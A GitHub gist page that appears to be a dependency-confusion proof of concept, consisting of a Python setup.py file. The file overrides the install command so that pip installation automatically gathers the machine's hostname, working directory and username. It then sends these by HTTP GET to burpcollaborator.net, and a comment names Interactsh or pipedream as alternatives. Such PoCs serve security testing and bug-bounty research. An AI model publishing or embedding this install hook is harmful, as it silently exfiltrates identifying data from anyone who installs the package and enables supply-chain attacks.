Created
May 15, 2022 22:55
-
-
Save rodnt/edace48f99ddc5ade6e6457fbe9da4f6 to your computer and use it in GitHub Desktop.
dependency confusion python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from setuptools import setup | |
from setuptools.command.install import install | |
import requests | |
import socket | |
import getpass | |
import os | |
class CustomInstall(install): | |
def run(self): | |
install.run(self) | |
hostname=socket.gethostname() | |
cwd = os.getcwd() | |
username = getpass.getuser() | |
ploads = {'hostname':hostname,'cwd':cwd,'username':username} | |
requests.get("https://burpcollaborator.net",params = ploads) #replace burpcollaborator.net with Interactsh or pipedream | |
setup(name='dependency1337', #package name | |
version='1.0.0', | |
description='test', | |
author='test', | |
license='MIT', | |
zip_safe=False, | |
cmdclass={'install': CustomInstall}) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment